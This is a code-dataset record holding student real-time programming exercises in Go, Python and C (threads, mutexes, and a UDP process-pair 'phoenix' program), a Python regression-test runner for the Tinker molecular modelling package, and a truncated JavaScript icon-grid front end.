2016-02-17T22:52:01
2016-02-17T22:52:01
49,940,682
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6509554386138916, "alphanum_fraction": 0.6656050682067871, "avg_line_length": 22.432836532592773, "blob_id": "f560743d4875d04a175419fb424119c677e931f5", "content_id": "836150849d919d41ea1d2fe72841e1b15b84aa47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1570, "license_type": "no_license", "max_line_length": 165, "num_lines": 67, "path": "/oving6/phoenix.go", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"flag\"\n\t\"fmt\"\n\t\"time\"\n\t\"udp\"\n\t\"os/exec\"\n)\n\nfunc main() {\n\tvar count int = 0\n\tvar backupCount int = count\n\tsendTimer := time.NewTimer(time.Second)\n\tmasterTimer := time.NewTimer(3000 * time.Millisecond)\n\treceiveChannel := make(chan int)\n\tsendChannel := make(chan int)\n\tkillChannel := make(chan struct{})\n\tkilledChannel := make(chan struct{})\n\t\n\t// Do some checking to see if booted to master or backup\n\tbackup := flag.Bool(\"backup\", false, \"Set backup or not\")\n\tflag.Parse()\n\t// Do the right thing depending on if master or backup\n\tif *backup {\n\t\tfmt.Println(\"Backup mode..\")\n\t\tgo udp.ReadUdp(receiveChannel, killChannel, killedChannel)\n\t} else {\n\t\tfmt.Println(\"Master mode..\")\n\t\tstartBackup()\n\t\tgo udp.SendUdp(sendChannel)\n\t}\n\tfor {\n\t\tselect {\n\t\tcase <-sendTimer.C:\n\t\t\tif !*backup {\n\t\t\t\tfmt.Printf(\"Count: %d\\n\", count)\n\t\t\t\tcount++\n\t\t\t\tsendChannel<-count\n\t\t\t\tsendTimer.Reset(time.Second)\n\t\t\t}\n\t\tcase <-masterTimer.C:\n\t\t\t// Master has timed out.\n\t\t\tif *backup {\n\t\t\t\t*backup = false\n\t\t\t\tcount = backupCount\n\t\t\t\tsendTimer.Reset(time.Second)\n\t\t\t\tmasterTimer.Stop();\n\t\t\t\t// Kill the UDP listener.\n\t\t\t\tclose(killChannel)\n\t\t\t\ttime.Sleep(2000*time.Millisecond)\n\t\t\t\t//<-killedChannel\n\t\t\t\tgo udp.SendUdp(sendChannel)\n\t\t\t\tstartBackup()\n\t\t\t}\n\t\tcase mes := <-receiveChannel:\n\t\t\tif *backup{\n\t\t\t\tbackupCount = mes\n\t\t\t\tmasterTimer.Reset(1500*time.Millisecond)\n\t\t\t}\n\t\t}\n\t}\n}\n\nfunc startBackup(){\n\t(exec.Command(\"osascript\", \"-e\",\"tell app \\\"Terminal\\\" to do script \\\"/Users/Lars/Dropbox/NTNU/Semester6/TTK4145/TTK4145--vinger/oving6/phoenix -backup\\\"\")).Start()\n}\n" }, { "alpha_fraction": 0.5030674934387207, "alphanum_fraction": 0.5766870975494385, "avg_line_length": 13.818181991577148, "blob_id": "b7a7ef65cea8f95ca0a9a64c2eb31c44d2cdf4f1", "content_id": "a0af358f8320da0e603ab7eea082d6de94c7c2c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 326, "license_type": "no_license", "max_line_length": 37, "num_lines": 22, "path": "/Øving1/pythonImpl.py", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "__author__ = 'Lars und Zach'\n\nimport thread\nimport time\n\n\ni = 0\n\ndef thread_1():\n for count in range(0, 1000000):\n global i\n i += 1\n\ndef thread_2():\n for count in range(0, 1000000):\n global i\n i -= 1\n\nthread.start_new_thread(thread_1, ())\nthread.start_new_thread(thread_2, ())\ntime.sleep(1)\nprint i\n" }, { "alpha_fraction": 0.6083915829658508, "alphanum_fraction": 0.632867157459259, "avg_line_length": 19.446428298950195, "blob_id": "966dbd5351079d6d090cc0319a0db6b47b8e3c94", "content_id": "a4539107e3b14c213bd5253fdba6f13cfd2d1b1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1144, "license_type": "no_license", "max_line_length": 59, "num_lines": 56, "path": "/Øving2/cImpl.c", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <string.h>\n#include <pthread.h>\n#include <stdlib.h>\n#include <unistd.h>\n\n/*\n\tTo compile : gcc -o OutputFile cFile\n\tTo run: ./OutputFile\n*/\n\t\nint i = 0;\npthread_mutex_t lock; // The mutex thread that is the lock.\n\nvoid *thread_1(){\n\tpthread_mutex_lock(&lock);\n\tfor (int count = 0; count < 1000001; count++)\n\t{\n\t\ti++;\n\t}\n\tprintf(\"%s\\n\", \"Done incrementing\");\n\tpthread_mutex_unlock(&lock);\n\tpthread_exit(NULL);\n}\n\nvoid *thread_2(){\n\tpthread_mutex_lock(&lock);\n\tfor (int count = 0; count < 1000000; count++){\n\t\ti--;\n\t}\n\tprintf(\"%s\\n\", \"Done decrementing\");\n\tpthread_mutex_unlock(&lock);\n\tpthread_exit(NULL);\n}\n\nint main(void){\n\t// Initialize the lock\n\tif(pthread_mutex_init(&lock, NULL) != 0){\n\t\tprintf(\"%s\\n\", \"Error initializing mutex\" );\n\t\treturn 1;\n\t}\n\n\t// Create the threads\n\tpthread_t thr[2];\n\tpthread_create(&thr[0], NULL, thread_1, NULL);\n\tpthread_create(&thr[1], NULL, thread_2, NULL);\n\n\tprintf(\"%s\\n\", \"Waiting to join threads\" );\n\t/* block until all threads complete */\n for (int count = 0; count < 2; count++) {\n \tpthread_join(thr[count], NULL);\n }\n pthread_mutex_destroy(&lock);\n printf(\"%i\\n\",i);\n\n}" }, { "alpha_fraction": 0.5939086079597473, "alphanum_fraction": 0.6480541229248047, "avg_line_length": 14.15384578704834, "blob_id": "1c9dc7738ad6959aa0d0da589c948ab969d30e63", "content_id": "410af5332456584c4544f1839487452299320208", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 591, "license_type": "no_license", "max_line_length": 62, "num_lines": 39, "path": "/Øving1/goImpl.go", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "// goImpl\npackage main\n\nimport (\n\t\"fmt\"\n\t\"sync\"\n\t\"time\"\n)\n\nvar i int = 0\n\nfunc thread_1() {\n\tfor counter := 0; counter < 1000000; counter++ {\n\t\ti++\n\n\t}\n}\n\nfunc thread_2() {\n\tfor counter := 0; counter < 1000000; counter++ {\n\t\ti--\n\t}\n}\n\nfunc main() {\n\tvar wg sync.WaitGroup\n\twg.Add(2)\n\tgo thread_1()\n\tgo thread_2()\n\ttime.Sleep(1000 * time.Millisecond)\n\n\tfmt.Println(i)\n\t/* The scheduler suspends and starts the threads at random,\n\tmeaning the first thread could increment to any number < 10^6\n\tthen the second thread starts decrementing it to any\n\t> i's current value - 10^6 and so on.\n\t*/\n\n}\n" }, { "alpha_fraction": 0.5480984449386597, "alphanum_fraction": 0.599552571773529, "avg_line_length": 14.964285850524902, "blob_id": "89a72b7f4b6594ab197d481095582080796a13c2", "content_id": "689bc1aec9f913473a1b5320f8cc6fce3674833f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 447, "license_type": "no_license", "max_line_length": 37, "num_lines": 28, "path": "/Øving2/pythonImpl.py", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "__author__ = 'Lars und Zach'\n\nimport thread\nimport time\nimport threading\n\n\ni = 0\nmutex = threading.Lock()\n\ndef thread_1():\n mutex.acquire()\n for count in range(0, 100000):\n global i\n i += 1\n mutex.release()\n\ndef thread_2():\n mutex.acquire()\n for count in range(0, 1000000):\n global i\n i -= 1\n mutex.release()\n\nthread.start_new_thread(thread_1, ())\nthread.start_new_thread(thread_2, ())\ntime.sleep(1)\nprint i\n" }, { "alpha_fraction": 0.6220158934593201, "alphanum_fraction": 0.6458885669708252, "avg_line_length": 19.671232223510742, "blob_id": "6ab11f3d0074865e4038f245ffe6e82a3124b822", "content_id": "575c35ee5ba7c2ddfa3a9ee147ba4bb1ba3e8fc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1508, "license_type": "no_license", "max_line_length": 80, "num_lines": 73, "path": "/oving6/src/udp/udp.go", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "package udp\n\n/*\n\tThis package acts as the network program for the phoenix program.\n\tIt is a standardized udp package that sends a byte slice over the network\n\tusing the udp protocol.\n*/\n\nimport (\n\t\"fmt\"\n\t\"net\"\n\t\"strconv\"\n)\ntype Message struct{\n\tValue int\n}\nfunc SendUdp(message chan int) {\n\tlocaladdress, err := net.ResolveUDPAddr(\"udp4\", \":9001\")\n\tbroadcastaddress,err := net.ResolveUDPAddr(\"udp4\", \"255.255.255.255:9000\")\n\tif err != nil {\n\t\tfmt.Println(\"UDP:\\t Could not resolve UDPAddress.\")\n\t\treturn \n\t}\n\tsock, err := net.ListenUDP(\"udp4\", localaddress)\n\tdefer func() {sock.Close()}()\n\tif err != nil {\n\t\tfmt.Printf(\"%s\\n\",err)\n\t\treturn\n\t}\n\tfor{\n\t\tselect{\n\t\t\tcase val :=<-message:\n\t\t\ttempstr := strconv.Itoa(val)\n\t\t\ttempslc := []byte(tempstr)\n\t\t\tsock.WriteToUDP(tempslc, broadcastaddress)\n\t\t}\n\t}\n\tfmt.Printf(\"Closing socket.\\n\")\n\tsock.Close()\n}\n\n/*\n\tThis will be run as a goroutine\n*/\nfunc ReadUdp(readChannel chan int, killChannel , killedChannel chan struct{}) {\n\tlocaladdress, err := net.ResolveUDPAddr(\"udp4\", \"0.0.0.0:9000\")\n\tsock, err := net.ListenUDP(\"udp4\", localaddress)\n\t\n\tdefer func() {sock.Close()}()\n\tdefer close(killedChannel)\n\n\tif err != nil {\n\t\tfmt.Printf(\"%s\\n\",err)\n\t\treturn\n\t}\n\tvar buf []byte = make([]byte, 16)\n\tfor {\n\t\tselect{\n\t\tcase _ , ok := <- killChannel:\n\t\t\tif !ok {\n\t\t\t\treturn\n\t\t\t}\n\t\tdefault:\n\t\t\tn,_,err := sock.ReadFromUDP(buf)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err)\n\t\t\t}\n\t\t\tcountstr := string(buf[0:n])\n\t\t\tcount,_ := strconv.Atoi(countstr)\n\t\t\treadChannel<-count\n\t\t}\t\n\t}\t\t\n}" }, { "alpha_fraction": 0.6865671873092651, "alphanum_fraction": 0.8059701323509216, "avg_line_length": 32.5, "blob_id": "3af972c862c11a1aa48dc2227b5e5ce5f9130c02", "content_id": "f6acd1eaaafb5640a961735ee2d7dbd26ea29c7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/README.md", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "# TTK4245\nRepo for the exercises in TTK4145 - Realtime Programming\n" } ]
7
andysim/tinkertests
https://github.com/andysim/tinkertests
09e8e0d222db4e7a37812d8435830b132a3a735a
a3224d71b77a2f70b305794979d26d31718db955
a2400810b59b19be3a76557ea8f7220e949a24d9
refs/heads/master
2021-01-22T21:33:15.686172
2017-03-19T19:23:43
2017-03-19T19:23:43
85,444,062
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7568448781967163, "alphanum_fraction": 0.763363778591156, "avg_line_length": 42.82857131958008, "blob_id": "cb40144f55222d2edd32f16fe3c88627d5cd2e59", "content_id": "cf842de44bdad5442f51362fb0690bca3f4e342d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1534, "license_type": "no_license", "max_line_length": 244, "num_lines": 35, "path": "/README.md", "repo_name": "andysim/tinkertests", "src_encoding": "UTF-8", "text": "# About\n\n\nTinkerTests is currently a standalone test suite for [Tinker](https://dasher.wustl.edu/tinker/), designed with the hope that it will find its way into the [main Tinker code](https://github.com/jayponder/tinker) eventually.\n\n## Usage\n\nThis wrapper is designed to be very lightweight and easy to use, relying primarily on deposited input files and reliable reference outputs. Full usage details, including parallel running and running subsets of tests, can be obtained by running\n\n\truntests.py --help\n\t\nfrom any directory. To run all tests, simply call the `runtests.py` script from any directory, after setting the `TINKERDIR` environmental variable to a folder containing the Tinker binaries.\n\n## Input markup\n\nThe script relies on special markers in the input file to determine how the calculation is to be run. See the current tests for examples of how to do this.\n\n#### #Description:\nThis should contain a (80 or fewer character) description of what this test does, for printing purposes.\n\n#### #Labels:\nOne or more labels used to categorize this test case, to allow easy running of a subset of tests using the -L \nflag.\n\n#### #Tolerance:\nSpecifies the precision to which certain quantities are checked. Currently supported values:-\n\n* Energy (default is 1E-6)\n* Gradient (default is 1E-6)\n* Geometry (default is 1E-6)\n\nThese are specified as, *e.g.* `#Precision Energy 1E-6` with as many lines as necessary to fully specify all tolerances.\n\n#### #RunCommand:\nThe command to run that will execute the test case.\n" }, { "alpha_fraction": 0.5001141428947449, "alphanum_fraction": 0.5408151745796204, "avg_line_length": 43.23737335205078, "blob_id": "f0463e7388473739578eede2e8235fd1579f51cd", "content_id": "bcb3734b2c1d946708805a725b0b900a90002654", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17518, "license_type": "no_license", "max_line_length": 121, "num_lines": 396, "path": "/runtests.py", "repo_name": "andysim/tinkertests", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom glob import glob\nimport os\nimport re\nimport subprocess\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport argparse\nimport sys\n\ndefault_tolerances = {\n 'energy' : 1e-6,\n 'gradient' : 1e-6,\n 'geometry' : 1e-6,\n}\n\ntry:\n TINKERDIR = os.environ['TINKERDIR']\nexcept KeyError:\n TINKERDIR = None\n\n#\n# Parse options\n#\nparser = argparse.ArgumentParser()\nparser.add_argument('-n', '--numprocs',\n type=int,\n help='The number of tests to run simultaneously.',\n default=1)\nparser.add_argument('-l', '--labels',\n nargs='*',\n help='Ron only tests containing the label(s) specified')\nparser.add_argument('-m', '--makerefs',\n action='store_true',\n help='Replaces reference files for tests (filtered by labels, if present) instead of testing.')\nparser.add_argument('-f', '--file',\n nargs=1,\n help='Process only the key file specified in this command.')\nparser.add_argument('-t', '--tinkerdir',\n help='The location of the tinker binaries (overrides the default found in $TINKERDIR).',\n default=TINKERDIR)\nparser.add_argument('-v', '--verbose',\n action='store_true',\n help='Provide detailed output.')\nargs = parser.parse_args()\n\nif not args.tinkerdir:\n raise Exception(\"Tinker executable directory not specied. Set the TINKERDIR variable, or use the --tinkerdir flag.\")\n\nif not os.path.isdir(args.tinkerdir):\n raise Exception(\"Tinker executable directory not valid: %s doesn't exist.\" % args.tinkerdir)\n\n\n\nCSI = \"\\x1B[\"\ndef make_green(s):\n return CSI + \"32;1m\" + s + CSI + \"0m\"\n\ndef make_red(s):\n return CSI + \"31;1m\" + s + CSI + \"0m\"\n\n\ndef run_tinker(commands, outfile, args):\n \"\"\" A helper utility to execute commands (specified as a list), writing the output\n to outfile, and returning the output as a list.\"\"\"\n\n if not isinstance(commands, list):\n raise ValueError(\"The commands argument to run_tinker should be a list of strings\")\n mycmd = commands[:]\n mycmd[0] = args.tinkerdir + \"/\" + mycmd[0]\n if args.verbose:\n print(\"Attempting to run: %s\" % \" \".join(mycmd))\n with open(outfile, 'w') as fp:\n process = subprocess.Popen(mycmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n stdout,stderr = process.communicate()\n # Python 3 returns a byte stream, so we convert here, just in case\n stdout = stdout.decode(sys.stdout.encoding)\n stderr = stderr.decode(sys.stdout.encoding)\n fp.write(stdout)\n fp.write(stderr + \"\\n\")\n if process.returncode:\n raise RuntimeError(\"Command\\n\\n\\t%s\\n\\nFailed. See %s for details.\" % (\" \".join(commands), outfile))\n return stdout.splitlines()\n\n\ndef parse_keywords(keyfile):\n keywords = { 'tolerance' : default_tolerances,\n 'description' : \"\",\n 'runcommand' : \"\",\n 'labels' : []}\n tolerances = default_tolerances.keys()\n for line in keyfile:\n line = line.strip().split()\n if not line: continue\n line[0] = line[0].lower()\n if line[0].startswith('#description'):\n keywords['description'] = \" \".join(line[1:])\n elif line[0].startswith('#tolerance'):\n try:\n if len(line) != 3:\n raise Exception()\n key = line[1]\n val = float(line[2])\n if key not in tolerances:\n raise Exception()\n keywords['tolerance'][key] = val\n except:\n raise SyntaxError(\"Bad tolerance argument! Should be\\n\\n#tolerance %s value\\n\\n\" % \"/\".join(tolerances))\n elif line[0].startswith('#labels'):\n keywords['labels'] = line[1:]\n elif line[0].startswith('#runcommand'):\n keywords['runcommand'] = line[1:]\n\n if not keywords['runcommand']:\n raise SyntaxError('#RunCommand not specified.')\n return keywords\n\n\ndef validate(refvals, outvals, keywords, args):\n if refvals.keys() != outvals.keys():\n raise Exception(\"Different keys detected in outputs\")\n failed = False\n for quantity in refvals.keys():\n if args.verbose:\n print(\"\\tChecking %s\" % quantity)\n try:\n tolerance = keywords['tolerance'][quantity]\n except KeyError:\n raise Exception(\"Comparison for %s is not supported.\" % quantity)\n if refvals[quantity].keys() != outvals[quantity].keys():\n raise Exception(\"Different keys detected for %s\" % quantity)\n for component in refvals[quantity].keys():\n out = outvals[quantity][component]\n ref = refvals[quantity][component]\n this_failed = False\n for o,r in zip(out, ref):\n if abs(o-r) > tolerance:\n failed = True\n this_failed = True\n if args.verbose:\n if this_failed:\n print(make_red(\"\\t\\t%s failed\" % component))\n else:\n print(\"\\t\\t%s passed\" % component)\n return failed\n\n\ndef parse_testgrad(out):\n #Total Potential Energy : -0.31418519 Kcal/mole\n totpotre = re.compile(r' Total Potential Energy :\\s*(-?\\d+\\.\\d+) Kcal/mole')\n # Anlyt 1 0.40103733 0.43512325 0.35325000 0.68916525\n agradre = re.compile(r' Anlyt\\s+\\d+\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(?:-?\\d+\\.\\d+)')\n # Numer 1 0.40103733 0.43512325 0.35325000 0.68916525\n ngradre = re.compile(r' Numer\\s+\\d+\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(?:-?\\d+\\.\\d+)')\n # This is a tough one to compile, but we're going to use it to parse out stuff like\n # Potential Energy Breakdown by Individual Components :\n #\n # Energy EB EA EBA EUB\n # Terms EAA EOPB EOPD EID\n # EIT ET EPT EBT\n # EAT ETT EV EC\n # ECD ED EM EP\n # ER ES ELF EG\n # EX\n #\n # 39.64034584 206.70961139 0.00000000 -4.31167395\n # 0.00000000 0.00000000 0.00000000 0.00000000\n # 0.00000000 0.00000000 0.00000000 0.00000000\n # 0.00000000 0.00000000 -0.16604375 0.00000000\n # 0.00000000 0.00000000 -0.21064571 -0.31418519\n # 0.00000000 0.00000000 0.00000000 0.00000000\n # 0.00000000\n #\n eheaderre = re.compile(r' Potential Energy Breakdown by Individual Components :\\n?')\n elabellinere = re.compile(r' (Energy|Terms)?(\\s+E[A-Z]+)+\\n?')\n evaluelinere = re.compile(r'(\\s+(-?\\d+\\.\\d+))+\\n?')\n elabelre = re.compile(r'E[A-Z]+')\n evaluere = re.compile(r'-?\\d+\\.\\d+')\n def parse_energy_terms(out):\n parsed_some_values = False\n labels = []\n values = []\n for line in out:\n # Look for labels\n match = elabellinere.match(line)\n if match:\n labels.extend(elabelre.findall(line))\n continue\n # Look for numbers\n match = evaluelinere.match(line)\n if match:\n values.extend(map(float, evaluere.findall(line)))\n parsed_some_values = True\n continue\n # The first blank line after the values signals the end for us\n if not line.strip() and parsed_some_values:\n return zip(labels, values)\n\n results = {}\n energy = {}\n gradient = {}\n agrad = []\n ngrad = []\n elabs = []\n evals = []\n for n,line in enumerate(out):\n # Total potential energy\n matches = totpotre.match(line)\n if matches: energy['Total Potential'] = [float(matches.group(1))]\n # Energy components\n matches = eheaderre.match(line)\n if matches:\n for l,v in parse_energy_terms(out[n:]):\n energy[l] = [v]\n # Analytic gradient\n matches = ngradre.match(line)\n if matches: ngrad.extend(map(float, matches.groups(1)))\n # Numerical gradient\n matches = agradre.match(line)\n if matches: agrad.extend(map(float, matches.groups(1)))\n\n if agrad: gradient['Analytic'] = agrad\n if ngrad: gradient['Numerical'] = ngrad\n results['energy'] = energy\n results['gradient'] = gradient\n return results\n\n\ndef parse_analyze(out):\n floatre = re.compile(r'-?\\d+\\.\\d+')\n results = {}\n energy = {}\n gradient = {}\n geometry = {}\n for n,line in enumerate(out):\n sl = line.split()\n # dE/dV (Virial-based) : 0.068212 Kcal/mole/A**3\n if line.startswith(\" dE/dV (Virial-based) :\"): gradient['Analytic Virial'] = [ float(sl[3]) ]\n # dE/dV (Finite Diff) : 0.068208 Kcal/mole/A**3\n if line.startswith(\" dE/dV (Finite Diff) :\"): gradient['Numerical Virial'] = [ float(sl[4]) ]\n # Pressure (Analytical, 0 K) : -4677.200 Atmospheres\n if line.startswith(\" Pressure (Analytical, 0 K) :\"): gradient['Analytical Pressure'] = [ float(sl[5]) ]\n # Pressure (Numerical, 0 K) : -4676.892 Atmospheres\n if line.startswith(\" Pressure (Numerical, 0 K) :\"): gradient['Numerical Pressure'] = [ float(sl[5]) ]\n # Bond Stretching 6349.1257 16569\n if line.startswith(\" Bond Stretching \"): energy['Bond Stretching'] = [ float(sl[2]) ]\n # Angle Bending 3749.0542 11584\n if line.startswith(\" Angle Bending \"): energy['Angle Bending'] = [ float(sl[2]) ]\n # Stretch-Bend -19.7897 4031\n if line.startswith(\" Stretch-Bend \"): energy['Stretch-Bend'] = [ float(sl[1]) ]\n # Urey-Bradley 668.1058 7023\n if line.startswith(\" Urey-Bradley \"): energy['Urey-Bradley'] = [ float(sl[1]) ]\n # Out-of-Plane Bend 110.8436 1566\n if line.startswith(\" Out-of-Plane Bend \"): energy['Out-of-Plane Bend'] = [ float(sl[2]) ]\n # Torsional Angle 433.6959 6701\n if line.startswith(\" Torsional Angle \"): energy['Torsional Angle'] = [ float(sl[2]) ]\n # Pi-Orbital Torsion 58.7507 292\n if line.startswith(\" Pi-Orbital Torsion \"): energy['Pi-Orbital Torsion'] = [ float(sl[2]) ]\n # Torsion-Torsion -41.9998 147\n if line.startswith(\" Torsion-Torsion \"): energy['Torsion-Torsion'] = [ float(sl[1]) ]\n # Van der Waals 31548.0594 8304545\n if line.startswith(\" Van der Waals \"): energy['Van der Waals'] = [ float(sl[3]) ]\n # Atomic Multipoles -78760.2884 1667721\n if line.startswith(\" Atomic Multipoles \"): energy['Atomic Multipoles'] = [ float(sl[2]) ]\n # Polarization -31796.4657 1667721\n if line.startswith(\" Polarization \"): energy['Polarization'] = [ float(sl[1]) ]\n # Internal Virial Tensor : 17258.896 115.886 -307.770\n # 115.886 16300.180 778.428\n # -307.770 778.428 15756.319\n if line.startswith(\" Internal Virial Tensor :\"):\n gradient['Virial Tensor'] = map(float, floatre.findall(\"\".join(out[n:n+3])))\n # Dipole Moment Magnitude : 1244.807 Debyes\n if line.startswith(\" Dipole Moment Magnitude :\"): energy['Dipole Norm'] = [ float(sl[4]) ]\n # Dipole X,Y,Z-Components : 1123.325 247.506 475.843\n if line.startswith(\" Dipole X,Y,Z-Components :\"): energy['Dipole Components'] = map(float, sl[3:6])\n # Quadrupole Moment Tensor : -1402.777 3261.667 3912.700\n # (Buckinghams) 3261.667 900.860 12633.678\n # 3912.700 12633.678 501.917\n if line.startswith(\" Quadrupole Moment Tensor :\"):\n energy['Quadrupole Components'] = map(float, floatre.findall(\"\".join(out[n:n+3])))\n # Radius of Gyration : 30.915 Angstroms\n if line.startswith(\" Radius of Gyration :\"): geometry['Radius of Gyration'] = [ float(sl[4]) ]\n # Total Potential Energy : -67700.9082 Kcal/mole\n if line.startswith(\" Total Potential Energy :\"): energy['Total Potential'] = [ float(sl[4]) ]\n results['energy'] = energy\n results['gradient'] = gradient\n results['geometry'] = geometry\n return results\n\n\ndef check_results(command, out, ref, keywords, args):\n \"\"\" The general strategy here is to parse out results into a common data structure, a dict of dict of lists:\n results[type][name] = [ val(s) ]\n where type is energy, gradient, coords, etc. (see keys of default_tolerances above); name is\n the specific quantity being tests, e.g. polarization energy, bonded energy. This way we can\n write a very generic validation routine (energies, forces and gradients can be tested the same way)\n that can obey tolerances provided by the user. Note that this means energies are provided as a list.\n By storing the names in the second index, we can print out meaningful messages with verbose on. \"\"\"\n\n if command[0] == 'testgrad':\n if args.verbose: print(\"Checking testgrad outputs\")\n refvals = parse_testgrad(ref)\n outvals = parse_testgrad(out)\n elif command[0] == 'analyze':\n if args.verbose: print(\"Checking analyze outputs\")\n refvals = parse_analyze(ref)\n outvals = parse_analyze(out)\n else:\n raise Exception(\"No handler defined to check %s yet!\" % command[0])\n return validate(refvals, outvals, keywords, args)\n\n\ndef run_testcase(testcase):\n \"\"\" Runs all steps needed for a single test case \"\"\"\n reffile = testcase + '.ref'\n outfile = testcase + '.out'\n\n with open('%s.key'%testcase, 'r') as fp:\n keywords = parse_keywords(fp)\n\n if args.labels:\n # The user asked to only run a subset; check to see if this test is included\n skip_this = True\n for argslabel in args.labels:\n argslabel = argslabel.lower()\n if argslabel in keywords['labels']:\n skip_this = False\n break\n if skip_this:\n if args.verbose:\n print(\"Specified label not found, skipping %s\" % testcase)\n return\n\n if args.makerefs:\n # Just make the reference outputs; no comparison\n print(\"\\tUpdating reference output for %s\" % testcase)\n run_tinker(keywords['runcommand'], reffile, args)\n else:\n # Run tests and compare to reference outputs\n if args.verbose:\n print(\"Working on %s...\\n\" % testcase)\n\n output = run_tinker(keywords['runcommand'], outfile, args)\n if check_results(keywords['runcommand'], output, open(reffile).readlines(), keywords, args):\n line = ' {0:.<86}FAILED'.format(keywords['description'])\n print(make_red(line))\n failures.append(testcase)\n else:\n line = ' {0:.<86}PASSED'.format(keywords['description'])\n print(line)\n\n\n#\n# Run the tests\n#\ntry:\n # Change directory to the tests\n scriptpath = os.path.dirname(os.path.realpath(__file__))\n testspath = scriptpath + '/tests'\n os.chdir(testspath)\n\n # Figure out the list of work\n if args.file:\n testcases = [ os.path.splitext(args.file[0])[0] ]\n else:\n testcases = [ os.path.splitext(testname)[0] for testname in glob('*.key') ]\n\n print(\"\\n\\tTesting binaries located in %s\" % args.tinkerdir)\n print(\"\\tRunning from %s, using %d cores\\n\" % (testspath, args.numprocs))\n\n failures = []\n if args.makerefs:\n print(\"\\t###########################################################\")\n print(\"\\t# WARNING! Reference files will be updated. You should #\")\n print(\"\\t# only be doing this with a reliable version of Tinker. #\")\n print(\"\\t###########################################################\")\n\n\n # Set up a pool of workers to crank out the work in parallel\n pool=ThreadPool(args.numprocs)\n pool.map(run_testcase, sorted(testcases))\n pool.close()\n pool.join()\nexcept KeyboardInterrupt:\n print(\"\\nTesting interrupted...\\n\")\n if len(failed):\n print(\"\\n The following tests failed:\\n\")\n print(\"\\n\".join(failures))\n sys.exit(1)\n\nif len(failures):\n print(\"\\nThe following %d of %d tests failed:\\n\" % (len(failures), len(testcases)))\n print(\"\\n\".join(failures))\nelse:\n if not args.makerefs:\n print(\"\\n All %d tests succeeded!\\n\" % len(testcases))\n" } ]
2
Logi-Meichu/GDeck
https://github.com/Logi-Meichu/GDeck
298e431c281c7aa8514ea0883734519f52bdffde
3362e9e87b43317383b03ea6f4f16d729390accf
7fc82d1388dd920a16b51918aef257b8387bff6d
refs/heads/master
2020-04-03T05:09:31.857415
2018-10-28T05:23:07
2018-10-28T05:23:07
155,036,551
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5812652111053467, "alphanum_fraction": 0.5895377397537231, "avg_line_length": 32.15322494506836, "blob_id": "d28dc4d1e8e614f28ca17869a23c6f0e4563d132", "content_id": "2b5af7f8c5011bc5fbe1a5f90c6b3a079f1ca397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4110, "license_type": "no_license", "max_line_length": 117, "num_lines": 124, "path": "/frontend/index.js", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "const $body = document.getElementsByTagName(\"body\")[0];\nlet curPage = 0;\n\nconst createPages = () => {\n return [...Array(4).keys()].map((i) => {\n const $div = document.createElement('div');\n $div.className = `page page-${i} ${i === 0 ? 'active' : 'page-next'}`;\n $div.pageid = i;\n $body.appendChild($div);\n \n const $container = document.createElement('div');\n $container.className = 'page-container';\n $div.appendChild($container);\n \n\n return [$div, $container];\n });\n}\n\nconst createGrids = ($page) => {\n [...Array(6).keys()].forEach((i) => {\n const $grid = document.createElement('div');\n $grid.className = `grid grid-${i}`;\n \n const $imgWrapper = document.createElement('div');\n $imgWrapper.id = `page-${$page[0].pageid}-grid-${i}`;\n $imgWrapper.className = 'img-wrapper';\n $grid.appendChild($imgWrapper);\n\n const $clickRing = document.createElement('div');\n $clickRing.className = 'click-ring';\n $imgWrapper.appendChild($clickRing);\n \n const $icon = document.createElement('img');\n $icon.src = `https://people.cs.nctu.edu.tw/~wctsai1130/gdeck/${$page[0].pageid}-${i}.png?v=${Math.random()}`;\n $icon.className = 'ico'\n $imgWrapper.appendChild($icon);\n \n $page[1].appendChild($grid);\n\n $imgWrapper.style = `height: ${$imgWrapper.clientWidth}px`;\n\n $icon.addEventListener('click', function() {\n $clickRing.className = `${$clickRing.className} active`;\n setTimeout(() => {\n $clickRing.className = $clickRing.className.replace('active', '');\n }, 400);\n });\n });\n}\n\nconst active = (i, $pages) => {\n $pages.forEach(($p) => {\n $p = $p[0];\n if ($p.pageid === i) {\n $p.className = $p.className.replace(/page-next|page-pre/, 'active');\n } else if ($p.pageid < i) {\n $p.className = $p.className.replace(/page-next|active/, 'page-pre');\n } else {\n $p.className = $p.className.replace(/page-pre|active/, 'page-next');\n }\n });\n};\n\nconst $pages = 